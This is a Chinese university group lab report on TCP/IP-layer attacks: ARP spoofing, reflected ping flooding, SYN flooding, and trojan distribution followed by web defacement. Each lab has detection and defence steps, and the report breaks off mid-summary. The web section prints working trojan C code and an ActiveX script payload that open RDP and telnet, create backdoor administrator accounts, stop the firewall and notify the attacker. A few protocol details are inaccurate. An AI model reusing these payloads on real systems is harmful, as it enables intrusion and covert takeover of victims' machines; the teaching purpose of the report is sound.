网络安全项目实战.doc

TCP/IP攻击网络安全项目实战报告题 目： TCP/IP攻击 小组成员： 王彬彬、汪永允、罗强、王华俊 论 文 摘 要 网络技术的发展已经给整个社会的科学技术、经济与文化带来了巨大的推动和冲击。随着计算机网络技术的发展和普及，全球信息化已成为人类发展的大趋势。一方面计算机网络的快速发展使得网上资源越来越丰富，电子商务、电子税务、电子海关、网上银行、网络防伪等诸多新兴业务也迅速兴起。网络不仅仅是资源共享和通信，更是一个金矿。另一方面由于Internet的国际化、社会化、开放化、个人化4个特点，使得网络安全问题变得越来越重要，计算机网络犯罪造成的损失不可估计。各种网络安全事件频繁发生说明了计算机网络的脆弱性。网络的开放性和共享性在方便了人们使用的同时也使得网络很容易遭受到攻击而攻击的后果是严重的诸如数据被人窃取，服务器不能正常提供服务等等。对于这些攻击人们也采用了一些防御手段除了不断的增强系统本身的安全性之外还采用了一些辅助设备。目前最常用的保护和检测设备就是防火墙和网络系统。防火墙通常作为网关使用, 这样不仅可以检测出网络攻击, 还能阻断这种攻击。而网络IDS作为并行设备, 则只能检测出网络攻击不能直接阻断这种攻击。它在检测到攻击后发出报警通知管理员然后管理员再来采取相应的处理措施。不同的攻击, 就有不同的防御方法我们只有在了解了这些攻击的基础上, 制定防范策略, 才能确保网络安全。现在的攻击手段虽然种类繁多但是主要利用的以下两类漏洞一类是TCP/IP协议本身的漏洞。这主要是因为TCP/IP协议的最初设计是基于互相信任的网络上, 因此缺乏对安全性的考虑。另一类就是操作系统的漏洞,很多操作系统在本身结构设计和代码设计时偏重于考虑系统使用的方便性, 导致了系统在远程访问、权限控制和口令管理及很多其它的方面存在安全漏洞。由于TCP/IP 协议是当前网络信息化建设中最为常用的协议系统，而TCP/IP 协议在设计之初并没有安全方面的考虑，其采用开放体系结构以及协议的灵活性在使得互联网以几何速度扩张的同时，也产生了一个致命的缺点，即缺乏信息安全性,因此, 对TCP/IP 协议下网络攻击技术的研究和防范显得尤为重要。TCP/IP的层次不同提供的安全性也不同，例如，在网络层提供虚拟私用网络，在传输层提供安全套接服务。下面分别介绍TCP/IP不同层次的安全性和提高安全性的方法，并详细介绍一些常见的攻击和防范方法。通过通过攻击试验对TCP/IP协议有一个清楚的认识和理解。一、 TCP/IP安全风险及其分析（一）TCP/IP的产生背景 在20世纪80年代末和90年代初，网络的规模和数量都得到了迅猛的增长，但是许多网络都是基于不同的硬件和软件而实现的，这使得他们之间互不兼容。显然在使用不同网络标准的网络之间是很难实现其通信的。为解决这个问题，国际标准组织ISO研究了许多网络方案，认识到需要一种可以有助于网络的建设者们实现网络、并用于通信和协同工作的网络模型，称为OSI/RM（open system interconnect reference model/reference model）参考模型，简称OSI参考模型。随着网络用户爆炸性的增长，由于OSI参考模型对“服务”与“协议”的定义结合起来，是的参考模型变得格外的复杂，实现起来也比较困难。同时，寻址、控流与差错控制在每一层重复出现，降低了系统的效率，同时关于数据的安全性、加密与网络管理等方面在设计初期也忽略了，而国际化标准组织又没及时提出适合的协议，于是TCP/IP协议就出现了，TCP/IP协议的出现满足了网络发展的需要，使得自身也得到发展和完善。尽管它不是某一标准化组织提出的正式标准，但它已经被公认为目前的工业标准或“事实标准”。因特网之所以能迅速发展，就是因为TCP/IP协议能够适应和满足世界范围内数据通信的需要。（二）、TCP/IP现状及发展概况TCP/IP(Transmission Control Protocol/Internet Protocol，传输控制协议/网际协议)是目前世界上应用最为广泛的协议，它使网络互联变得容易起来，并且使越来越多的网络加入其中，成为Internet 的事实标准.虽然从名称上看TCP/IP包括两种协议，即传输控制协议和网际协议，但是TCP/IP 实际是一组协议，它包括上百个能完成各种功能的协议，而TCP 协议和IP 协议是认证数据完整传输的两个基本重要功能。（三）、TCP/IP体系结构及功能TCP/IP协议簇包括四个功能层：应用层、传输层、网络层及网络接口层。这四层概括了相对于OSI参考模型中的七层。1、网络接口层网络接口层包括用于物理连接、传输的所有功能。OSI模型把这一层功能分为两层：物理层和数据链路层，TCP/IP参考模型把两层合在一起。TCP/IP体系结构并未定义具体的网络接口层协议，而是旨在提供灵活性，以适应各种网络类型，例如LAN,WAN.它允许主机联入网络时使用多种现成的和流行的协议，如局域网协议或其他协议。2、网络层（Internet层）网络层由在两个主机之间通信所必须的协议和过程组成。这意味着数据报文必须是可路由的。功能：处理来自传输层的分组发送请求处理收到的数据报，处理icmp报文、路由、流控与拥塞控制。3、传输层这一层支持的功能包括：为了在网络中传输对应用数据进行分段，执行数学检查来保证所收数据的完整性，为多个应用同时传输数据多路复用数据流(传输和接收)。这意味着该层能识别特殊应用，对乱序收到的数据进行重新排序。当前的主机到主机层包括两个协议实体：传输控制协议(TCP)和用户数据报协议(UDP)。4、应用层应用层协议提供远程访问和资源共享。应用包括Telnet服务、FTP服务、SMTP服务和HTTP服务等，很多其他应用程序驻留并运行在此层，并且依赖于底层的功能。该层是最难保护的一层。TCP/IP体系结构：（四）TCP/IP安全性分析TCP/IP 协议是一组包括TCP 协议和IP 协议、UDP 协议、ICMP协议和其他协议的协议组。TCP/IP 协议共分为4 层，即应用层、传输层、网络层和数据链路层。其中应用层向用户提供访问Internet 的一些高层协议，使用最为广泛的有TELNET、FTP、SMTP、DNS 等。传输层提供应用程序端到端的通信服务。网络层负责相邻主机之间的通信。数据链路层是TCP/IP 协议组的最低一层，主要负责数据帧的发送和接收。其工作原理是：源主机应用层将一串应用数据流传送给传输层，传输层将其截成分组，并加上TCP 报头形成TCP 段送交网络层，网络层给TCP 段加上包括源主机和目的主机IP 地址的IP 报头，生成一个IP 数据包，并送交数据链路层；数据链路层在其MAC 帧的数据部分装上IP 数据包，再加上源主机和目的主机的MAC 地址和帧头，并根据其目的MAC 地址，将MAC 帧发往目的主机或IP 路由器，目的主机的数据链路层将MAC 帧的帧头去掉，将IP 数据包送交网络层；网络层检查IP 报头，如果报头中校验和与计算结果不一致，则丢弃该IP 数据包。如果一致则去掉IP 报头，将TCP 段送交传输层；传输层检查顺序号，判断是否是正确的TCP 分组，然后检查TCP 报头数据，若正确，则向源主机发确认信息，若不正确则丢包，向源主机要求重发信息，传输层去掉TCP 报头，将排好顺序的分组组成应用数据流送给应用程序。这样目的主机接收到的字节流，就像是直接来自源主机一样1、数据链路层数据链路层是TCP/IP 协议的最底层。它主要实现对上层数据（IP或ARP）进行物理帧的封装与拆封以及硬件寻址、管理等功能。在以太网中，由于信道是共享的，数据以“帧”为单位在网络上传输，因此，任何主机发送的每一个以太帧都会到达与其处于同一网段的所有主机的以太网接口。当数字信号到达一台主机的网络接口时，根据CSMA/ CD 协议，正常状态下，网络接口对读入数据进行检查，如果数据帧中携带的物理地址是自己的或者物理地址是广播地址，那么就会将数据帧交给IP 层软件。当数据帧不属于自己时,就把它忽略掉。然而，目前网络上存在一些被称为嗅探器(Sniffer)的软件，如NeXRay、Sniffit、IPMan 等。攻击方稍作设置或修改，使网卡工作在监听模式下，则可达到非法窃取他人信息(如用户账户、口令等)的目的。防范对策： 装检测软件,查看是否有Sniffer 在网络中运行,做到防范于未然。 对数据进行加密传输,使对方无法正确还原窃取的数据，并且对传输的数据进行压缩，以提高传输速度。 改用交换式的网络拓扑结构，使数据只发往目的地址的网卡,其他网卡接收不到数据包，这种方法的缺点是交换机成本太高。2、网络层（1）IP 欺骗在TCP/IP协议中,IP地址是用来作为网络节点的惟一标志。IP协议根据IP 头中的目的地址来发送IP数据包。在IP路由IP包时，对IP头中提供的源地址不做任何检查，并且认为IP 头中的源地址即为发送该包的机器的IP地址。这样，攻击者可以直接修改节点的IP地址，冒充某个可信节点的IP地址攻击或者编程(如RawSocket) ，实现对IP地址的伪装，即所谓IP 欺骗。攻击者可以采用IP 欺骗的方法来绕过网络防火墙。另外对一些以IP地址作为安全权限分配依据的网络应用，攻击者很容易使用IP 欺骗的方法获得特权，从而给被攻击者造成严重的损失。（2）防范对策： 抛弃基于地址的信任策略。 采用加密技术，在通信时要求加密传输和验证。 进行包过滤。如果网络是通过路由器接入Internet 的，那么可以利用路由器来进行包过滤。确认只有内部LAN 可以使用信任关系，而内部LAN 上的主机对于LAN 以外的主机要慎重处理。路由器可以过滤掉所有来自于外部而希望与内部建立连接的请求。（3）ICMP 漏洞ICMP 运行于网络层,它被用来传送IP 的控制信息，如网络通不通、主机是否可达、路由是否可用等网络本身的消息。常用的Ping 命令就是使用ICMP 协议，Ping 程序是通过发送一个ICMP Echo 请求消息和接收一个响应的ICMP 回应来测试主机的连通性。几乎所有的基于TCP/ IP 的机器都会对ICMP Echo 请求进行响应。所以如果一个敌意主机同时运行很多个Ping 命令，向一个服务器发送超过其处理能力的ICMP Echo 请求时, 就可以淹没该服务器使其拒绝其它服务，即向主机发起“Ping of Death ”（死亡之Ping）攻击。死亡之Ping是较为原始的拒绝服务攻击手段。解决方法较成熟： 可给操作系统打上补丁(patch)。 在主机上设置ICMP 数据包的处理规则，最好是设定拒绝所有的ICMP 数据包。 利用防火墙来阻止Ping。但同时会阻挡一些合法应用,可只阻止被分段的Ping。使得在大多数系统上只允许一般合法的64Byte 的Ping 通过,这样就能挡住那些长度大于MTU (MaximuTransmission Unit)的ICMP 数据包,从而防止此类攻击。3、传输层TCP 是基于连接的。为了在主机A 和B 之间传递TCP 数据，必须通三次握手机制建立连接。其连接过程如下：A B :A 向B 发SYN , 初始序列号为ISN1；B A: B 向A 发SYN，初始序列号为ISN2，同时对ISN1 确认；A B :A 向B 发对ISN2 的确认。建立连接以后，主要采用滑动窗口机制来验证对方发送的数据，如果对方发送的数据不在自己的接收窗口内，则丢弃此数据, 这种发送序号不在对方接收窗口的状态称为非同步状态。由于TCP 协议并不对数据包进行加密和认证，确认数据包的主要根据就是判断序列号是否正确。这样一来，当通信双方进入非同步状态后，攻击者可以伪造发送序号在有效接收窗口内的报文，也可以截获报文，篡改内容后，再修改发送序号，而接收方会认为数据是有效数据，即进行TCP 会话劫持。目前存在一些软件可以进行TCP 会话劫持,如Hunt 等。防范对策： 在传输层对数据进行加密。 使用安全协议，对通信和会话加密，如使用SSL 代替telnet 和ftp。(3) 运用某些入侵检测软件(IDS)或者审计工具，来查看和分析自己的系统是否受到了攻击。4、应用层在应用层常见的攻击手段是DNS 欺骗。攻击者伪造机器名称和网络的信息,当主机需要将一个域名转化为IP 地址时，它会向某DNS服务器发送一个查询请求。同样，在将IP 地址转化为域名时，可发送一个反查询请求。如果服务器在进行DNS 查询时人为地给出攻击者自己的应答信息, 就产生了DNS 欺骗。由于网络上的主机都信任DNS 服务器, 一个被破坏的DNS 服务器就可以将客户引导到非法的服务器,从而就可以使某个地址产生欺骗。防范对策: 直接用IP 访问重要的服务，从而避开DNS 欺骗攻击 加密所有对外的数据流。在服务器端, 尽量使用SSH。 等有加密支持的协议；在客户端, 应用PGP 等软件加密发到网络上的数据。（一）数据链路层 -ARP攻击1. 实验原理：（1）拓扑图：（2）ARP报文分析及原理：IP数据包常通过以太网发送。以太网设备并不识别32位IP地址：它们是以48位以太网地址传输以太网数据包的。因此，IP驱动器必须把IP目的地址转换成以太网网目的地址。在这两种地址之间存在着某种静态的或算法的映射，常常需要查看一张表。地址解析协议(Address Resolution Protocol，ARP)就是用来确定这些映象的协议。ARP工作时，送出一个含有所希望的IP地址的以太网广播数据包。目的地主机，或另一个代表该主机的系统，以一个含有IP和以太网地址对的数据包作为应答。发送者将这个地址对高速缓存起来，以节约不必要的ARP通信。如果有一个不被信任的节点对本地网络具有写访问许可权，那么也会有某种风险。这样一台机器可以发布虚假的ARP报文并将所有通信都转向它自己，然后它就可以扮演某些机器，或者顺便对数据流进行简单的修改。ARP机制常常是自动起作用的。在特别安全的网络上， ARP映射可以用固件，并且具有自动抑制协议达到防止干扰的目的。上图是一个用作IP到以太网地址转换的ARP报文的例子。在图中每一行为32位，也就是4个八位组表示。硬件类型字段指明了发送方想知道的硬件接口类型，以太网的值为1。协议类型字段指明了发送方提供的高层协议类型，IP为0806（16进制）。硬件地址长度和协议长度指明了硬件地址和高层协议地址的长度，这样ARP报文就可以在任意硬件和任意协议的网络中使用。操作字段用来表示这个报文的目的，ARP请求为1，ARP响应为2。当发出ARP请求时，发送方填好发送方首部和发送方IP地址，还要填写目标IP地址。当目标机器收到这个ARP广播包时，就会在响应报文中填上自己的48位主机地址。而ARP欺骗就是利用这个漏洞进行洪泛大量IP与MAC错误对应的报文达到欺骗效果。2. 实验目的：（1）演示黑客常用的ARP攻击手段；（2）通过攻击论述如何进行有效的检测和防御。3. 实验环境：（1）被攻击主机A （IP：00 MAC：00-0C-29-06-59-7D 安装Windows 2003系统）并安装sniffer pro 4.7.5网络数据抓取工具。（2）服务器主机B （IP：54 MAC：00-0C-29-32-FA-43 安装Windows 2003系统）搭建FTP服务器供用户访问，并设置安全策略禁止主机C访问自己，主机A可以自由访问自己。（3）黑客主机C（ IP：52 MAC：E0-CB-4E-E0-39-EC 安装Windows XP系统）并安装工具科来数据包生成器1.0。 （4）所有服务器及主机均在同一局域网下。4. 实验步骤：（1）攻击过程步骤一、安装FTP和科来数据包生成器。本实验的FTP用上一个实验的FTP，科来数据包生成器安装结果，如下图所示：步骤二、填写数据包一个用于down掉主机A，一个用于欺骗主机B即FTP服务器。如下图所示： 没攻击之前 arp a 显示：主机B ： 主机C ： 单击放送，如下图所示攻击后：主机 C使用arp a命令显示如下图所示：主机B使用arp a命令显示如下图所示：主机A登录服务器B不成功。如下图所示：（2）攻击检测：如上所示。（3）攻击防范： 使用静态的ARP缓存首先使用arp d host_entry然后使用 arp s ip 地址 MAC地址 建立静态的ARP表建立如下文件： T 08:00:20:ba:a1:f2 U 08:00:20:ee:de:1f使用arp f filename加载进去，这样的ARP映射将不会过期和被更新，除非使用arp d才能删除。但这种方法破坏了动态的ARP协议。 禁止ARP可以通过ipconfig interface arp 完全禁止ARP，这样，网卡不会发送ARP和接受ARP包。 减少过期时间#ndd set /dev/arp arp_cleanup_interval 60000#ndd set /dev/ip ip_ire_flush_internal 60000 60000=60000毫秒 默认是300000（二）网络层-ping洪泛攻击1、实验原理（1）拓扑图黑客主机A向主机B发送大量伪源IP（被攻击主机C的IP）的ping请求报文，当主机B收到大量ping洪水后，查看源IP是IPC，于是向主机C发送大量回复报文形成洪水淹没主机C。反射主机承受强度为黑客主机承受强度的2倍（理论值，根据主机数据处理能力而定），被攻击主机承受洪水强度与黑客主机相等。这种攻击可以进行ping欺骗已达到单路洪水同时攻击两台主机的效果。（2）ICMP报文格式：ICMP全称Internet Control Message Protocol，中文名为因特网控制报文协议。它工作在OSI的网络层，向数据通讯中的源主机报告错误。ICMP可以实现故障隔离和故障恢复。 网络本身是不可靠的，在网络传输过程中，可能会发生许多突发事件并导致数据传输失败。网络层的IP协议是一个无连接的协议，它不会处理网络层传输中的故障，而位于网络层的ICMP协议却恰好弥补了IP的缺限，它使用IP协议进行信息传递，向数据包中的源端节点提供发生在网络层的错误信息反馈。 类型：标识生成的错误报文，它是ICMP报文中的第一个字段； 代码：进一步地限定生成ICMP报文。该字段用来查找产生错误的原因； 校验和：存储了ICMP所使用的校验和值； 未使用：保留字段，供将来使用，起值设为0； 数据：包含了所有接受到的数据报的IP报头。还包含IP数据报中前8个字节的数据； ICMP提供多种类型的消息为源端节点提供网络层的故障信息反馈，它的报文类型可以归纳为以下5个大类： 诊断报文（类型8，代码0；类型0，代码0）； 目的不可达报文（类型3，代码0-15）； 重定向报文（类型5，代码0-4）； 超时报文（类型11，代码0-1）； 信息报文（类型12-18）。 2、实验目的（1）简单演示一些黑客如何通过ping洪水进行高效率攻击；（2）论述如何对诸如此类的ping攻击进行检测与防御。3、实验环境（1）黑客主机A（IP：0 安装Windows XP系统）使用科来数据包生成器制作攻击大字段数据包（这里采用1414字节大小的ICMP请求包），安装sniffer pro网络抓包工具及科来数据包生成器。因为科来数据包洪水强度不太明显，这里我又开启了sniffer用来辅助洪泛使强度更明显；（2）ping洪水反射主机B（IP：54 安装Windows 2003系统），已安装window 2003自带的“网络监视工具”：（3）被攻击主机C（IP：53 安装Windows 2003系统）；（4）均在局域网下实现。4、实验步骤（1）攻击过程： 黑客主机A使用科来数据包生成器制作攻击数据包： 黑客主机A使用snffer抓包工具制作攻击数据包：黑客主机A设置数据包为循环发送，发送延迟为0： 查看主机B的CPU使用率明显增高（这里黑客只使用了一台平常PC进行攻击，所以攻击效果并不十分明显）：没有攻击前主机B的CPU使用率：被攻击时主机B的CPU使用率： 查看主机C的CPU使用率明显增高：没有攻击前主机B的CPU使用率：被攻击时主机B的CPU使用率： 查看黑客主机A时间T内发送字节数（发送：303,796,579字节）：查看主机B时间T内收/发送字节数（收到：304,008,445字节；发送：12,901,458字节）：查看黑客主机A时间T内接收字节数（收到：13,104,012字节）：从数据可以看出：、黑客主机A发送数据量（303,796,579字节） = 反射主机B收到数据量（304,008,445字节）、反射主机B发送数据量（12,901,458字节） = 被攻击主机C接收数据量（13,104,012字节）、至于为什么：反射主机B收到数据量（304,008,445字节） ！= 反射主机B发送数据量（12,901,458字节），我认为是反射主机B的数据处理能力比较弱（用的是虚拟机）。（2）攻击检测： 主机B在没有访问其它网络资源的情况下查看“本地连接状态”数据增加速度很快： 主机C在没有访问其它网络资源的情况下查看“本地连接状态”数据增加速度很快： 主机B使用“网络监视工具”捕获大量来自“IPC”的ping请求报文，并发送大量回复报文： 主机C使用“网络监视工具”捕获大量来自“IPB”的ping回复报文：（三）攻击防范：主机B： 开启Windows自带防火墙：未开启Windows自带防火墙前：开启Windows自带防火墙后：开启防火墙后，主机B会感知到正在遭受攻击，而不再向53回复ICMP数据包。 通过安装防火墙进行ping拦截（这里使用“天网”防火墙），如 天网、ISA等：主机C：防御方案同主机B。（三）传输层 -SYN洪泛攻击1、实验原理：（1）拓扑图：（2）TCP的首部图下图展示了TCP首部的数据格式。如果不计任选(Options)字段，那么，它的大小是20个字节。 （3）TCP连接的建立与终止 TCP连接的建立TCP协议通过三个报文段完成连接的建立，这个过程称为三次握手(three-way handshake)，过程如下图所示。 TCP的三次握手 TCP连接的终止建立一个连接需要三次握手，而终止一个连接要经过四次握手，这是由TCP的半关闭(half-close)造成的。具体过程如下图所示。 TCP连接的终止（4）TCP的服务流程：TCP协议提供的是可靠的、面向连接的传输控制协议，即在传输数据前要先建立逻辑连接，然后再传输数据，最后释放连接3个过程。TCP提供端到端、全双工通信；采用字节流方式，如果字节流太长，将其分段；提供紧急数据传送功能。 尽管TCP和UDP都使用相同的网络层（IP），TCP却向应用层提供与UDP完全不同的服务。 TCP提供一种面向连接的、可靠的字节流服务。 面向连接意味着两个使用TCP的应用（通常是一个客户和一个服务器）在彼此交换数据之前必须先建立一个TCP连接。这一过程与打电话很相似，先拨号振铃，等待对方摘机说“喂”，然后才说明是谁。 在一个TCP连接中，仅有两方进行彼此通信。广播和多播不能用于TCP。 TCP通过下列方式来提供可靠性： 应用数据被分割成TCP认为最适合发送的数据块。这和UDP完全不同，应用程序产生的数据报长度将保持不变。由TCP传递给IP的信息单位称为报文段或段（segment）TCP如何确定报文段的长度。 当TCP发出一个段后，它启动一个定时器，等待目的端确认收到这个报文段。如果不能及时收到一个确认，将重发这个报文段。o当TCP收到发自TCP连接另一端的数据，它将发送一个确认。这个确认不是立即发送，通常将推迟几分之一秒 TCP将保持它首部和数据的检验和。这是一个端到端的检验和，目的是检测数据在传输过程中的任何变化。如果收到段的检验和有差错，TCP将丢弃这个报文段和不确认收到此报文段（希望发端超时并重发）。 既然TCP报文段作为IP数据报来传输，而IP数据报的到达可能会失序，因此TCP报文段的到达也可能会失序。如果必要，TCP将对收到的数据进行重新排序，将收到的数据以正确的顺序交给应用层。 既然IP数据报会发生重复，TCP的接收端必须丢弃重复的数据。 TCP还能提供流量控制。TCP连接的每一方都有固定大小的缓冲空间。TCP的接收端只允许另一端发送接收端缓冲区所能接纳的数据。这将防止较快主机致使较慢主机的缓冲区溢出。 两个应用程序通过TCP连接交换8bit字节构成的字节流。TCP不在字节流中插入记录标识符。我们将这称为字节流服务（bytestreamservice）。如果一方的应用程序先传10字节，又传20字节，再传50字节，连接的另一方将无法了解发方每次发送了多少字节。收方可以分4次接收这80个字节，每次接收20字节。一端将字节流放到TCP连接上，同样的字节流将出现在TCP连接的另一端。 另外，TCP对字节流的内容不作任何解释。TCP不知道传输的数据字节流是二进制数据，还是ASCII字符、EBCDIC字符或者其他类型数据。对字节流的解释由TCP连接双方的应用层解释。 这种对字节流的处理方式与Unix操作系统对文件的处理方式很相似。Unix的内核对一个应用读或写的内容不作任何解释，而是交给应用程序处理。对Unix的内核来说，它无法区分一个二进制文件与一个文本文件。 TCP是因特网中的传输层协议，使用三次握手协议建立连接。当主动方发出SYN连接请求后，等待对方回答SYN，ACK。这种建立连接的方法可以防止产生错误的连接，TCP使用的流量控制协议是可变大小的滑动窗口协议。第一次握手：建立连接时，客户端发送SYN包(SEQ=x)到服务器，并进入SYN_SEND状态，等待服务器确认。第二次握手：服务器收到SYN包，必须确认客户的SYN(ACK=x+1),同时自己也送一个SYN包(SEQ=y),即SYN+ACK包，此时服务器进入SYN_RECV状态。第三次握手：客户端收到服务器的SYN+ACK包，向服务器发送确认包ACK(ACK=y+1),此包发送完毕，客户端和服务器时入Established状态，完成三次握手。（5）TCP建立连接要进行三次握手，采用SYN攻击，发送大量半连接报文导致服务器半连接数达到最大以至于无法再接受其它主机的连接请求。2、实验目的：（1）演示黑客常用的基于TCP的SYN洪泛攻击手段；（2）通过论述如何对SYN攻击进行有效的检测与防御。3、试验环境：（1）黑客主机A（IP：51 安装Windows XP系统），安装科来数据包生成器v1.0；（2）服务器主机B（IP：53 MAC：00:0C:29:F8:B8:69 安装Windows 2003系统），安装Windows 2003自带“网络监视工具”；（3）测试主机C（IP：54）；（4）服务器及主机均在同一局域网下实现。4、实验步骤：（1）攻击过程： 黑客主机利用科来数据包生成器制作SYN攻击包，如下图所示：确认序列号为：0 SYN被置位 查看服务器CPU使用率达到100%，如下图所示：（2）攻击检测：服务器主机B利用“网络监视工具”抓包发现大量SYN数据包，如下图所示：在服务器遭受攻击前，测试主机C可以访问服务器B，如下图所示：在服务器遭受攻击后，测试主机C可以访问服务器B，如下图所示：（3）攻击防范： 开启Windows系统自带防火墙，如下图所示： 安装防火墙，如：天网、ISA等（这里以“天网”为例）：根据用抓包工具抓取的源IP（00）设置安全过滤策略，如下图所示：保存防火墙规则，防火墙检测到攻击并记录，如下图所示：（四）应用层 -WEB攻击1、实验原理：（1）拓扑图：（2）该实验黑客利用FTP服务器安置木马文件（嫁接到一些管理员常用的应用程序上，如 sniffer），然后在各大论坛或者网站宣传FTP站点，若碰到WEB服务器A管理员下载并运行后，程序会主动向黑客发送message消息，黑客通过查看arp表发现近期有IP（WEB服务器A的IP），黑客此时就可通过预留的后门进入WEB服务器A并对其WEB页面篡改。而篡改的结果是：当其它用户（如客户机C）访问A的WEB页面时会自动跳转到黑客的WEB页面，这时黑客的WEB页面就会执行自身代码对客户机C进行注册表修改打开3389端口，并留下后门（其实黑客页面不仅仅是要在用户主机上留后门，还可以通过自己的页面加载一些广告，起到“一举两得”的效果）。（3）黑客这种攻击一些成功因素： 要宣传自己安置过的FTP站点； 要保证FTP上嫁接木马的软件是一些管理员常用的软件（如 sniffer）； 通过黑一些访问流量高的WEB服务器进一步抓取更多客户端主机并做广告。2、实验目的：（1）演示网站挂马常用的一些手段（这里通过使用FTP网站挂马）；（2）演示黑客惯用的WEB攻击手段（这里采用对正常WEB服务器主页修改）和整个抓肉鸡的过程；（3）论述客户机及服务器如何对WEB攻击进行有效的检测与防御。3、实验环境：（1）创建DNS服务器D（IP：27 安装Windows 2003系统），为实验中用到的一些服务器做域名解析；如下图所示：（2）黑客主机A上创建FTP服务器（域名： IP：53 安装Windows 2003系统），并在FTP服务器传上已嫁接木马的文件；（3）黑客主机A上搭建WEB服务器（域名：http:/www.diqizu_ IP：53），并在该WEB页面中添加脚本修改客户机注册表项开启3389端口，并执行向黑客WEB服务器发送提示信息；（4）搭建一个访问流量较高的WEB服务器（域名： IP：14 安装Windows 2003系统）供用户日常访问；如下图所示：（5）客户机C作为测试主机（IP：1 安装Windows 2003系统）；（6）所有服务器及主机均存在于同一局域网内。4、实验步骤：（1）攻击过程： 黑客主机A搭建FTP服务器，并上传嫁接了木马的病毒文件到该FTP服务器（ftp:/ftp.diqizu_）：黑客FTP服务器搭建成功，如下图所示：木马文件代码（c语言），如下代码所示：#include main()system(color f7);system(reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t reg_dword /d 00000000 /f);system(reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server /v fAllowToGetHelp /t reg_dword /d 00000001 /f);system(net user diqizu 123456 /add);system(net localgroup Remote Desktop Users admin /add);system(net localgroup Administrators admin /add);system(sc config TlntSvr start= auto);system(taskkill /f /im alg.exe);system(net start telnet);system(cls);system(net stop sharedaccess);system(sc config Messenger start= auto);system(cls);system(net start messenger);system(net send 53 我是肉鸡-ftp-第七组成员飞过);进行木马文件嫁接：sniffer_4.70.530.exe + muma.exe，如下图所示： 黑客主机A搭建WEB服务器（http:/www.diqizu_），如下图所示：WEB服务器截图：WEB页面恶意代码，如下代码所示：var s =new ActiveXObject(“wscript.shell”);s.Run(color f7,1,true);s.Run(reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t reg_dword /d 00000000 /f,1,true);s.Run(reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server /v fAllowToGetHelp /t reg_dword /d 00000001 /f,1,true);s.Run(net user diqizu_hack 123456 /add,1,true);s.Run(net localgroup Administrators diqizu_hack /add,1,true);s.Run(sc config TlntSvr start= auto,1,true);s.Run(sc config Messenger start= auto,1,true);s.Run(net start telnet,1,true);s.Run(net start messenger,1,true);s.Run(net send tunln 我是肉鸡-第七组飞过！,1,true); WEB服务器B访问黑客FTP站点ftp:/ftp.diqizu_，并下载嫁接木马文件在本机上运行，继而感染病毒，被开启23端口，并创建管理员用户（账号：diqizu 密码：123456），向黑客主机A（53）发送message消息，提示黑客主机有主机已运行病毒文件；黑客主机A收到来自WEB服务器B的message消息，如下图所示： 黑客主机A收到message消息后，使用arp a命令查看地址表，发现近期记录有54地址的mac表项，如下图所示： 黑客主机A使用“用户：diqizu 密码：123456”telnet 54，登陆成功，如下图所示： 黑客主机A在远程主机上执行dir c:wwwroot命令查看B的主页名称，如下图所示：黑客主机A在远程主机上执行ftp命令上传WEB服务器B主页到FTP站点0其中使用用户名为：canput 密码：123456，此用户具有写权限，如下图所示： 黑客A打开FTP站点发现WEB服务器B的主页已上传成功，如下图所示：黑客A修改WEB服务器B的主页代码，加入自动跳转到黑客WEB地址www.diqizu_的代码，如下代码所示： 黑客A在telnet成功后命令窗口下把WEB服务器B的主页强行替换成修改后的主页文件，如下图所示： 客户机C访问服务器B，访问成功后自动执行页面中的跳转代码，链接到黑客A的WEB页面：黑客A的WEB页面自动执行自身代码修改客户机注册表项开启3389端口，并留下后门账号：diqizu_kehuji 密码：123456，同时自动向黑客主机发送messeage消息，如下图所示： 黑客A使用arp a命令查看本地mac表，看到最近mac表项有IP：1，如下图所示：黑客A使用远程桌面登陆1（账号：diqizu_kehuji 密码：123456），如下图所示：黑客A登陆成功，如下图所示：（2）攻击检测：WEB服务器B： 使用net start命令查看当前开启服务，发现telnet开启，如下图所示： 查看进程，发现TlntServ.exe项，如下图所示： 查看本地用户，发现可以账户，如下图所示： 查看事务日志，发现用户diqizu曾成功telnet过该主机，如下图所示：主机C： 查看本地用户，发现可以账户，如下图所示： 打开“我的电脑”“属性”“远程”发现“允许用户远程连接到此计算机”选项被选中，如下图所示：（3）攻击防范：WEB服务器B： 设置WEB主页访问权限为除administrator用户外其他用户只有“只读”权限，如下图所示： 黑客再次通过Telnet删除文件，如下图所示： 禁用telnet服务，如下图所示： 黑客再次登录，如下图所示： 安装防火墙，如：天网、ISA等（这里以“天网”为例）：设置禁止其它主机远程Telnet登录规则，如下图所示：“天网”拦截情况，如下图所示：主机C： 设置浏览器“安全”项，禁止浏览器执行加载项或执行加载项时进行提醒，如下图所示：三、总结现如今基于TCP/IP的攻击严重威胁网络的安全，从最基层的网络用户到网络管理员无不遭受过各式各样网络攻击的危害。而我们能做的就是切合实际做好网络检测与防范，从网络管理层到基层用户全线布防。了解一些常见的黑客网络攻击手段，能够应对网络攻击进行定位并采取一些可能的措施。（一）TCP/IP数据链路层：数据链路层攻击主要基于局域网环境，而最为常见的就是ARP攻击。这种攻击采用惯见的ARP地址欺骗向局域网洪泛大量携带错误IP-MAC对应关系的广播包或者单播包，导致收到广播包或单播包的主机刷新自己的ARP地址表形成错误映射关系，这种错误映射关系最终导致网关或某些主机无法访问。arp攻击目的一般就是向目标主机通告错误的IP-MAC对应关系，通过使用arp a命令检查可对比以往MAC有不同，通过抓包可看到大量ARP洪水